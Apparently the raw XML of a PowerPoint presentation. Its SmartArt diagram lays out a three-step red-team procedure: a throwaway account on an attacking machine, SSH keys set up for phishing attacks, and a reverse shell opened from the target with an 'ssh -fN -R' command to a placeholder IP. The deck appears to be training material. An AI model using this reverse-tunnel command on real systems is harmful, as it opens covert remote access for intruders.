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1" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="277" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="280" r:id="rId9"/>
    <p:sldId id="281" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="275" r:id="rId13"/>
    <p:sldId id="276" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="278" r:id="rId17"/>
    <p:sldId id="279" r:id="rId18"/>
    <p:sldId id="271"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7055C0-55D4-4323-8816-EE2A09F153A2}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent4_2" csCatId="accent4" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B32A1EAF-FF8D-457B-898B-059F4925F381}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Make throwaway account</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C8F84A6-6706-4638-B6B1-A6B1FD3A5CC9}" type="parTrans" cxnId="{5620A755-B279-4AA8-8673-490B354953C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0219221C-8E6F-4FD8-9625-C01038D07592}" type="sibTrans" cxnId="{5620A755-B279-4AA8-8673-490B354953C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B99A003F-B644-4E80-8620-2A9A0AA19437}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Make a throwaway account on your attacking machine (SSHD Server) with the permissions of /bin/false, preventing third parties from compromising the connection.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{717C12AB-F8EB-4561-9BF3-203E1769939F}" type="parTrans" cxnId="{2CBE1B23-FC39-4FA6-8F4A-EB7D955EBA21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6FC0FFD3-639A-46DF-AF2E-2626EB0DFDF1}" type="sibTrans" cxnId="{2CBE1B23-FC39-4FA6-8F4A-EB7D955EBA21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CABFB267-17F8-4B3E-97BE-969895354E11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Generate keypair</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63EF1415-9E83-489E-AE65-EDB2B11EC5C6}" type="parTrans" cxnId="{E5EC7D2D-AE71-41CB-B560-E83BBA6169FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9CA0705-A6F6-4A17-AAD2-6A428B53B6F2}" type="sibTrans" cxnId="{E5EC7D2D-AE71-41CB-B560-E83BBA6169FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF04592C-E2AD-4766-9599-03CE3E589B13}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Make SSH key access available on attacking machine to automate SSH key access when executing any phishing attacks and generate new keypair on target environment.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9B5EDD1-76BE-474E-BA43-7C03EEA885B7}" type="parTrans" cxnId="{CCADB1FA-35FC-478A-9798-253F29740374}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2FDEB54-89F6-43E1-B67D-A183A293A1B0}" type="sibTrans" cxnId="{CCADB1FA-35FC-478A-9798-253F29740374}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Establish Reverse Shell</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70DD7E99-2B90-4E24-B28B-68497DC2A4FE}" type="parTrans" cxnId="{8FFFFA8A-6AF6-40FE-8BED-2B539A16FC54}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA7FCE35-06DD-4013-8FF3-966B4FEAB60B}" type="sibTrans" cxnId="{8FFFFA8A-6AF6-40FE-8BED-2B539A16FC54}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD9A681A-75B9-4D23-9F24-DDDDE1832288}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Generate new keypair on target environment and establish a reverse shell using: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>ssh</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>fN</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> –R 2200:127.0.0.1:22 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>throwaway-account@IP</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06E3118B-4836-423D-8F41-8B351755210F}" type="parTrans" cxnId="{02F85292-2BAF-4ABD-8BD6-23C42A506546}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BEE93F3B-5E80-407B-B1F5-C942F46A7E7C}" type="sibTrans" cxnId="{02F85292-2BAF-4ABD-8BD6-23C42A506546}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" type="pres">
      <dgm:prSet presAssocID="{467055C0-55D4-4323-8816-EE2A09F153A2}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16FFDEB6-0DB8-4478-BBD3-B99A5E91816C}" type="pres">
      <dgm:prSet presAssocID="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" presName="boxAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93E966A8-19A2-4944-ADFA-258A5672E961}" type="pres">
      <dgm:prSet presAssocID="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" presName="parentTextBox" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AA9A46A6-3A44-4748-B5D0-D4A2EDE73618}" type="pres">
      <dgm:prSet presAssocID="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" presName="descendantBox" presStyleLbl="bgAccFollowNode1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82815C55-6F18-4013-B11B-3697CEDF8970}" type="pres">
      <dgm:prSet presAssocID="{E9CA0705-A6F6-4A17-AAD2-6A428B53B6F2}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7FA1275F-4AB9-46E0-BE73-63F1C15967D7}" type="pres">
      <dgm:prSet presAssocID="{CABFB267-17F8-4B3E-97BE-969895354E11}" presName="arrowAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6D966D8F-A4BC-4371-82FB-17003FDFA3F0}" type="pres">
      <dgm:prSet presAssocID="{CABFB267-17F8-4B3E-97BE-969895354E11}" presName="parentTextArrow" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{75D4DB8A-44BC-4202-B8E1-B84504161224}" type="pres">
      <dgm:prSet presAssocID="{CABFB267-17F8-4B3E-97BE-969895354E11}" presName="arrow" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B0C93D81-48F5-4568-AB72-9AFD2D89C154}" type="pres">
      <dgm:prSet presAssocID="{CABFB267-17F8-4B3E-97BE-969895354E11}" presName="descendantArrow" presStyleLbl="bgAccFollowNode1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{500AAF0D-8DA9-4D32-9608-DF9086C0C0AC}" type="pres">
      <dgm:prSet presAssocID="{0219221C-8E6F-4FD8-9625-C01038D07592}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68DEBC19-1517-4671-9B54-994C6E6C7639}" type="pres">
      <dgm:prSet presAssocID="{B32A1EAF-FF8D-457B-898B-059F4925F381}" presName="arrowAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{114BFECD-0BD4-4027-B68F-A29BB5636D70}" type="pres">
      <dgm:prSet presAssocID="{B32A1EAF-FF8D-457B-898B-059F4925F381}" presName="parentTextArrow" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE3D5627-CAF3-4CE0-AF36-6240D59104BD}" type="pres">
      <dgm:prSet presAssocID="{B32A1EAF-FF8D-457B-898B-059F4925F381}" presName="arrow" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F4618C8-3311-455B-84E8-E531E4625D69}" type="pres">
      <dgm:prSet presAssocID="{B32A1EAF-FF8D-457B-898B-059F4925F381}" presName="descendantArrow" presStyleLbl="bgAccFollowNode1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2CBE1B23-FC39-4FA6-8F4A-EB7D955EBA21}" srcId="{B32A1EAF-FF8D-457B-898B-059F4925F381}" destId="{B99A003F-B644-4E80-8620-2A9A0AA19437}" srcOrd="0" destOrd="0" parTransId="{717C12AB-F8EB-4561-9BF3-203E1769939F}" sibTransId="{6FC0FFD3-639A-46DF-AF2E-2626EB0DFDF1}"/>
    <dgm:cxn modelId="{E5EC7D2D-AE71-41CB-B560-E83BBA6169FC}" srcId="{467055C0-55D4-4323-8816-EE2A09F153A2}" destId="{CABFB267-17F8-4B3E-97BE-969895354E11}" srcOrd="1" destOrd="0" parTransId="{63EF1415-9E83-489E-AE65-EDB2B11EC5C6}" sibTransId="{E9CA0705-A6F6-4A17-AAD2-6A428B53B6F2}"/>
    <dgm:cxn modelId="{5620A755-B279-4AA8-8673-490B354953C7}" srcId="{467055C0-55D4-4323-8816-EE2A09F153A2}" destId="{B32A1EAF-FF8D-457B-898B-059F4925F381}" srcOrd="0" destOrd="0" parTransId="{8C8F84A6-6706-4638-B6B1-A6B1FD3A5CC9}" sibTransId="{0219221C-8E6F-4FD8-9625-C01038D07592}"/>
    <dgm:cxn modelId="{C94FAF59-0A2C-49D6-9046-341D7B818324}" type="presOf" srcId="{CD9A681A-75B9-4D23-9F24-DDDDE1832288}" destId="{AA9A46A6-3A44-4748-B5D0-D4A2EDE73618}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{B4D87D7B-4D5A-4640-820B-0A9B0A940CED}" type="presOf" srcId="{CABFB267-17F8-4B3E-97BE-969895354E11}" destId="{75D4DB8A-44BC-4202-B8E1-B84504161224}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{8FFFFA8A-6AF6-40FE-8BED-2B539A16FC54}" srcId="{467055C0-55D4-4323-8816-EE2A09F153A2}" destId="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" srcOrd="2" destOrd="0" parTransId="{70DD7E99-2B90-4E24-B28B-68497DC2A4FE}" sibTransId="{AA7FCE35-06DD-4013-8FF3-966B4FEAB60B}"/>
    <dgm:cxn modelId="{2E8EDC8F-7A91-4BBF-90C6-FEA0EF015088}" type="presOf" srcId="{B32A1EAF-FF8D-457B-898B-059F4925F381}" destId="{BE3D5627-CAF3-4CE0-AF36-6240D59104BD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{02F85292-2BAF-4ABD-8BD6-23C42A506546}" srcId="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" destId="{CD9A681A-75B9-4D23-9F24-DDDDE1832288}" srcOrd="0" destOrd="0" parTransId="{06E3118B-4836-423D-8F41-8B351755210F}" sibTransId="{BEE93F3B-5E80-407B-B1F5-C942F46A7E7C}"/>
    <dgm:cxn modelId="{F27C7BA5-6AB9-4F52-90E8-5B4A209E8EC0}" type="presOf" srcId="{467055C0-55D4-4323-8816-EE2A09F153A2}" destId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{93B863B9-0AC5-477E-9513-AD40B8D8BB09}" type="presOf" srcId="{CABFB267-17F8-4B3E-97BE-969895354E11}" destId="{6D966D8F-A4BC-4371-82FB-17003FDFA3F0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{61FEB9C2-8D20-40C5-91A5-3B133E8D84CC}" type="presOf" srcId="{B32A1EAF-FF8D-457B-898B-059F4925F381}" destId="{114BFECD-0BD4-4027-B68F-A29BB5636D70}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{B144F9CF-BF16-441B-8065-A0AAEA0207C0}" type="presOf" srcId="{B99A003F-B644-4E80-8620-2A9A0AA19437}" destId="{7F4618C8-3311-455B-84E8-E531E4625D69}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{49238BDE-F368-4D87-B65B-56A6F5D30AFE}" type="presOf" srcId="{FF04592C-E2AD-4766-9599-03CE3E589B13}" destId="{B0C93D81-48F5-4568-AB72-9AFD2D89C154}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{5EAD12F2-BAD5-42A0-B1F0-2CA6F7F87F19}" type="presOf" srcId="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" destId="{93E966A8-19A2-4944-ADFA-258A5672E961}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{CCADB1FA-35FC-478A-9798-253F29740374}" srcId="{CABFB267-17F8-4B3E-97BE-969895354E11}" destId="{FF04592C-E2AD-4766-9599-03CE3E589B13}" srcOrd="0" destOrd="0" parTransId="{B9B5EDD1-76BE-474E-BA43-7C03EEA885B7}" sibTransId="{A2FDEB54-89F6-43E1-B67D-A183A293A1B0}"/>
    <dgm:cxn modelId="{9008072C-B380-4CCE-9155-CE232C83ADDF}" type="presParOf" srcId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" destId="{16FFDEB6-0DB8-4478-BBD3-B99A5E91816C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{F7857B50-166F-425C-BA1F-35BE6588BE81}" type="presParOf" srcId="{16FFDEB6-0DB8-4478-BBD3-B99A5E91816C}" destId="{93E966A8-19A2-4944-ADFA-258A5672E961}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{899DEC35-2A78-47E2-87DD-BB7897A37C27}" type="presParOf" srcId="{16FFDEB6-0DB8-4478-BBD3-B99A5E91816C}" destId="{AA9A46A6-3A44-4748-B5D0-D4A2EDE73618}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{6C1D3FB0-C81F-4F78-9C01-A5C5E5881E02}" type="presParOf" srcId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" destId="{82815C55-6F18-4013-B11B-3697CEDF8970}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{F516A42F-7E01-4127-AB51-D8C27183F5A2}" type="presParOf" srcId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" destId="{7FA1275F-4AB9-46E0-BE73-63F1C15967D7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{D1A0E5CC-40F5-463F-900B-36493E348B20}" type="presParOf" srcId="{7FA1275F-4AB9-46E0-BE73-63F1C15967D7}" destId="{6D966D8F-A4BC-4371-82FB-17003FDFA3F0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{475EE872-CDCD-4B9B-9295-B2B640341487}" type="presParOf" srcId="{7FA1275F-4AB9-46E0-BE73-63F1C15967D7}" destId="{75D4DB8A-44BC-4202-B8E1-B84504161224}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{D4EFC8DD-7627-452E-A8E9-2FCCE073739C}" type="presParOf" srcId="{7FA1275F-4AB9-46E0-BE73-63F1C15967D7}" destId="{B0C93D81-48F5-4568-AB72-9AFD2D89C154}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{276BD8B3-3682-4972-A56C-BF132A7863F3}" type="presParOf" srcId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" destId="{500AAF0D-8DA9-4D32-9608-DF9086C0C0AC}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{A115221C-53BF-4255-9F7C-D0D16CD576D8}" type="presParOf" srcId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" destId="{68DEBC19-1517-4671-9B54-994C6E6C7639}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{F3FBCBA5-376A-40B5-841C-12883C660159}" type="presParOf" srcId="{68DEBC19-1517-4671-9B54-994C6E6C7639}" destId="{114BFECD-0BD4-4027-B68F-A29BB5636D70}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{F55B1C59-029D-4246-B963-3460B992D398}" type="presParOf" srcId="{68DEBC19-1517-4671-9B54-994C6E6C7639}" destId="{BE3D5627-CAF3-4CE0-AF36-6240D59104BD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{1ABBD09D-E6AC-480E-A878-C1D7F10CDB2A}" type="presParOf" srcId="{68DEBC19-1517-4671-9B54-994C6E6C7639}" destId="{7F4618C8-3311-455B-84E8-E531E4625D69}"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966A8-19A2-4944-ADFA-258A5672E961}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2921763"/>
          <a:ext cx="2149078" cy="958987"/>
        </a:xfrm>
        <a:prstGeom prst="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Establish Reverse Shell</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2921763"/>
        <a:ext cx="2149078" cy="958987"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AA9A46A6-3A44-4748-B5D0-D4A2EDE73618}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2149077" y="2921763"/>
          <a:ext cx="6447234" cy="958987"/>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Generate new keypair on target environment and establish a reverse shell using: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>ssh</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>fN</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> –R 2200:127.0.0.1:22 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>throwaway-account@IP</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2149077" y="2921763"/>
        <a:ext cx="6447234" cy="958987"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{75D4DB8A-44BC-4202-B8E1-B84504161224}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="0" y="1461224"/>
          <a:ext cx="2149078" cy="1474923"/>
        </a:xfrm>
        <a:prstGeom prst="upArrowCallout">
          <a:avLst>
            <a:gd name="adj1" fmla="val 5000"/>
            <a:gd name="adj2" fmla="val 10000"/>
            <a:gd name="adj3" fmla="val 15000"/>
            <a:gd name="adj4" fmla="val 64977"/>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Generate keypair</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-10800000">
        <a:off x="0" y="1461224"/>
        <a:ext cx="2149078" cy="958700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B0C93D81-48F5-4568-AB72-9AFD2D89C154}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2149077" y="1461224"/>
          <a:ext cx="6447234" cy="958700"/>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dirty="0"/>
            <a:t>Make SSH key access available on attacking machine to automate SSH key access when executing any phishing attacks and generate new keypair on target environment.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2149077" y="1461224"/>
        <a:ext cx="6447234" cy="958700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE3D5627-CAF3-4CE0-AF36-6240D59104BD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="0" y="686"/>
          <a:ext cx="2149078" cy="1474923"/>
        </a:xfrm>
        <a:prstGeom prst="upArrowCallout">
          <a:avLst>
            <a:gd name="adj1" fmla="val 5000"/>
            <a:gd name="adj2" fmla="val 10000"/>
            <a:gd name="adj3" fmla="val 15000"/>
            <a:gd name="adj4" fmla="val 64977"/>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w="12700" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent4">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842" tIns="135128" rIns="152842" bIns="135128" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            <a:t>Make throwaway account</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-10800000">
        <a:off x="0" y="686"/>
        <a:ext cx="2149078" cy="958700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7F4618C8-3311-455B-84E8-E531E4625D69}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2149077" y="686"/>
          <a:ext cx="6447234" cy="958700"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:alpha val="90000"/>
            <a:tint val="40000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="12700" cap="rnd"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0780" tIns="177800" rIns="130780" bIns="177800" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200"/>
